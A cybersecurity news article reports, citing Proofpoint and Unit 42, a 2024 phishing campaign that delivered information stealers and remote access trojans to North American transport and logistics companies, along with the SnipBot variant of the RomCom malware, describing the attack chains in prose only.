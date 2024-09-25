Transportation and logistics companies in North America are theobjective of a new phishing campaign that distributes a variety of stolen information and remote access trojans (RATs).

The group, according to Proofpoint, uses compromised legitimate email accounts belonging to shipping and freight companies to insert malicious content into existing email conversations.

North American Freight Companies and Malware: Here’s What Happened

Up to 15 email accounts have been identified as being compromised as part of the campaign. It is currently unclear how these accounts were initially compromised or who is behind the attacks.

“The activities that occurred from May to July 2024 predominantly deployed Lumma Stealer, StealC or NetSupport,” has declared the corporate security firm in an analysis published Tuesday and then added: “In August 2024, the cybercriminal [o gruppo di criminali informatici] changed tactics by employing new infrastructure and a new distribution technique, also adding payloads to distribute DanaBot and Arechclient2.“

The attack chains involve sending messages with internet link (.URL) attachments or Google Drive URLs that lead to a .URL file that, once launched, uses Server Message Block (SMB) to retrieve the next-stage payload containing the malware from a remote share.

Some variations of the campaign observed in August 2024 also exploited a recently popular technique called ClickFix to trick victims into downloading the DanaBot malware under the pretext of fixing a problem with displaying document content in the web browser (in short, it is not so different from the infamous deceptive links).

Specifically, this involves encouraging users to copy and paste a Base64-encoded PowerShell script into the terminal, thus triggering the infection process.

The transport companies that were targeted

“These campaigns impersonated Samsara, AMB Logistic and Astra TMS – software that would be used only in the management of transport and fleet operations,” Proofpoint said, adding later; “The specific targeting and compromises of organizations in the transportation and logistics industry, as well as the use of decoys impersonating software specifically designed for freight operations and fleet management, indicate that the author(s) likely researches the target companies’ operations before sending the campaigns.“

The revelation comes at a time when various types of information-stealing malware are emerging such as Angry Stealer, BLX Stealer (also known as XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxurious, Poseidon, Powershell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer and a variant of CryptBot nicknamed Yet Another Silly Stealer (YASS).

Among other things, it follows the emergence of a new version of the RomCom RAT, a successor to PEAPOD (also known as RomCom 4.0) called SnipBot, distributed via fake links inserted in phishing emails; some aspects of the campaign had previously been highlighted by the Computer Emergency Response Team of Ukraine (CERT-UA) in July 2024.

“SnipBot provides the attacker with the ability to execute commands and download additional modules onto the victim’s system“, they have declared researchers Yaron Samuel and Dominik Reichel of Palo Alto Networks Unit 42, who went on to say: “The initial payload is always either an executable downloader disguised as a PDF file or a real PDF file sent to the victim via email that leads to an executable.“

While systems infected with RomCom have also seen ransomware deployments in the past, the cybersecurity firm noted the absence of this behavior, raising the possibility that the threat behind the malware, Tropical Scorpius (also known as Void Rabisu), has shifted from pure financial gain to espionage.

And what do you think about this attack on transport companies? Write it in the comments.